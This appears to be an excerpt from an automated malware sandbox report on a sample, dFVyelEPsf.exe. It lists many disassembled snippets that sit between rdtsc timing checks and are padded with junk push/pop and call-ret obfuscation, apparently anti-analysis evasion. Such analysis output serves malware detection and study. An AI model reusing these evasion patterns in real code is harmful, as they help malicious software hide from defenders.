Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: ECCA37 second address: ECCAB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 jns 00007FA521013256h 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D2031h], ebx 0x00000013 and si, 997Ah 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007FA521013238h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 mov ecx, dword ptr [ebp+122D357Fh] 0x0000003a call 00007FA521013239h 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FA52101323Ah 0x00000048 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: ECCAB2 second address: ECCAC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: ECCAC2 second address: ECCAD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52101323Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: ECCAD9 second address: ECCAE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: ECCAE2 second address: ECCB06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA521013247h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: ECCB06 second address: ECCB2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007FA52075DA65h 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: ECCB2C second address: ECCB31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: ECCCB3 second address: ECCCCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FA52075DA56h 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e pushad 0x0000000f jnc 00007FA52075DA56h 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: ECCCCF second address: ECCCD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EEC85B second address: EEC874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA52075DA64h 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EEC874 second address: EEC89A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FA521013244h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 jns 00007FA521013236h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EECB66 second address: EECBAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jmp 00007FA52075DA68h 0x0000000c jmp 00007FA52075DA5Dh 0x00000011 jmp 00007FA52075DA69h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EECD21 second address: EECD27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EECD27 second address: EECD2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EECD2B second address: EECD69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jnc 00007FA521013236h 0x00000011 jmp 00007FA521013243h 0x00000016 popad 0x00000017 jmp 00007FA521013249h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EECECD second address: EECF17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b jp 00007FA52075DA56h 0x00000011 jns 00007FA52075DA56h 0x00000017 jmp 00007FA52075DA63h 0x0000001c jmp 00007FA52075DA64h 0x00000021 popad 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EED33E second address: EED342 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EED342 second address: EED34A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EED34A second address: EED354 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FA52101323Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EED354 second address: EED366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push edi 0x00000007 pushad 0x00000008 popad 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EED366 second address: EED36A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EED36A second address: EED389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FA52075DA5Fh 0x0000000e ja 00007FA52075DA56h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EED66E second address: EED6AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA521013236h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c popad 0x0000000d push ebx 0x0000000e jmp 00007FA52101323Fh 0x00000013 jmp 00007FA521013249h 0x00000018 pop ebx 0x00000019 push eax 0x0000001a pushad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EEE13F second address: EEE143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EEE582 second address: EEE59A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA521013244h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EEE59A second address: EEE5C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FA52075DA64h 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007FA52075DA5Bh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EEE5C5 second address: EEE5CA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EF05B5 second address: EF05BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EF0D27 second address: EF0D2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EF0D2D second address: EF0D33 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EF0EAD second address: EF0EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFADAA second address: EFADC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA52075DA62h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFAEFD second address: EFAF06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFB083 second address: EFB088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFB088 second address: EFB08D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFB08D second address: EFB0AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA52075DA5Ch 0x00000009 jmp 00007FA52075DA5Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFB4DE second address: EFB4FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007FA521013244h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFB4FF second address: EFB505 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFB666 second address: EFB66B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFB66B second address: EFB684 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FA52075DA58h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FA52075DA5Bh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFBED5 second address: EFBED9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFBED9 second address: EFBEE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFBFC9 second address: EFBFDB instructions: 0x00000000 rdtsc 0x00000002 jo 00007FA521013238h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFBFDB second address: EFBFE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFC7CF second address: EFC7D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFC7D3 second address: EFC801 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA5Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b pushad 0x0000000c push esi 0x0000000d jmp 00007FA52075DA63h 0x00000012 pop esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jno 00007FA52075DA56h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFCBEC second address: EFCBF5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFCBF5 second address: EFCC06 instructions: 0x00000000 rdtsc 0x00000002 js 00007FA52075DA56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFCC06 second address: EFCC0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFCC0B second address: EFCC15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007FA52075DA56h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFCCBB second address: EFCD06 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FA52101323Ch 0x0000000c popad 0x0000000d mov dword ptr [esp], ebx 0x00000010 jmp 00007FA52101323Bh 0x00000015 nop 0x00000016 jmp 00007FA52101323Ch 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f jmp 00007FA521013242h 0x00000024 ja 00007FA521013236h 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFCD06 second address: EFCD0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFCE56 second address: EFCE5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFCE5C second address: EFCE79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 jmp 00007FA52075DA5Eh 0x0000000b pop esi 0x0000000c popad 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFCE79 second address: EFCE7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFCE7D second address: EFCE83 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFE126 second address: EFE12A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: EFE12A second address: EFE13A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F00C37 second address: F00C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F01D52 second address: F01D69 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA5Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F01AE6 second address: F01AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F01D69 second address: F01DFA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 jnc 00007FA52075DA60h 0x0000000e nop 0x0000000f mov esi, ecx 0x00000011 jmp 00007FA52075DA66h 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push edi 0x0000001b call 00007FA52075DA58h 0x00000020 pop edi 0x00000021 mov dword ptr [esp+04h], edi 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc edi 0x0000002e push edi 0x0000002f ret 0x00000030 pop edi 0x00000031 ret 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push esi 0x00000037 call 00007FA52075DA58h 0x0000003c pop esi 0x0000003d mov dword ptr [esp+04h], esi 0x00000041 add dword ptr [esp+04h], 00000018h 0x00000049 inc esi 0x0000004a push esi 0x0000004b ret 0x0000004c pop esi 0x0000004d ret 0x0000004e mov edi, dword ptr [ebp+122D2404h] 0x00000054 push eax 0x00000055 push eax 0x00000056 push edx 0x00000057 jg 00007FA52075DA67h 0x0000005d rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F01AEA second address: F01B00 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FA52101323Ch 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F01B00 second address: F01B06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F01B06 second address: F01B0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F0375D second address: F0377C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FA52075DA69h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F04729 second address: F04733 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FA521013236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F04733 second address: F04738 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F089EB second address: F089EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F09FB1 second address: F09FB7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F09FB7 second address: F0A049 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FA521013238h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 sub dword ptr [ebp+12449815h], eax 0x0000002b push 00000000h 0x0000002d mov di, D33Fh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push edi 0x00000036 call 00007FA521013238h 0x0000003b pop edi 0x0000003c mov dword ptr [esp+04h], edi 0x00000040 add dword ptr [esp+04h], 00000015h 0x00000048 inc edi 0x00000049 push edi 0x0000004a ret 0x0000004b pop edi 0x0000004c ret 0x0000004d jmp 00007FA52101323Eh 0x00000052 xchg eax, esi 0x00000053 jne 00007FA52101324Fh 0x00000059 push eax 0x0000005a jng 00007FA521013248h 0x00000060 push eax 0x00000061 push edx 0x00000062 jne 00007FA521013236h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F0AEFE second address: F0AF04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F0A1EE second address: F0A25C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FA521013236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ebp 0x0000000e call 00007FA521013238h 0x00000013 pop ebp 0x00000014 mov dword ptr [esp+04h], ebp 0x00000018 add dword ptr [esp+04h], 00000017h 0x00000020 inc ebp 0x00000021 push ebp 0x00000022 ret 0x00000023 pop ebp 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c jmp 00007FA52101323Ah 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 mov di, E870h 0x0000003c mov eax, dword ptr [ebp+122D0FEDh] 0x00000042 jbe 00007FA521013238h 0x00000048 mov bh, ch 0x0000004a push FFFFFFFFh 0x0000004c mov edi, 0AAF8195h 0x00000051 push eax 0x00000052 or ebx, 13C19835h 0x00000058 pop ebx 0x00000059 push eax 0x0000005a pushad 0x0000005b pushad 0x0000005c jo 00007FA521013236h 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F0AF04 second address: F0AF48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push edi 0x0000000a call 00007FA52075DA58h 0x0000000f pop edi 0x00000010 mov dword ptr [esp+04h], edi 0x00000014 add dword ptr [esp+04h], 00000016h 0x0000001c inc edi 0x0000001d push edi 0x0000001e ret 0x0000001f pop edi 0x00000020 ret 0x00000021 mov ebx, dword ptr [ebp+122D1FD9h] 0x00000027 push 00000000h 0x00000029 mov dword ptr [ebp+12443287h], ebx 0x0000002f push 00000000h 0x00000031 mov ebx, 65889884h 0x00000036 xchg eax, esi 0x00000037 push edx 0x00000038 jo 00007FA52075DA5Ch 0x0000003e push eax 0x0000003f push edx 0x00000040 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F0B107 second address: F0B10D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F0B10D second address: F0B129 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA52075DA5Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f je 00007FA52075DA56h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F0B129 second address: F0B132 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F0C0EA second address: F0C0EF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F0B1F4 second address: F0B200 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F0D270 second address: F0D276 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dFVyelEPsf.exe RDTSC instruction interceptor: First address: F0E1C8 second address: F0E1D1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
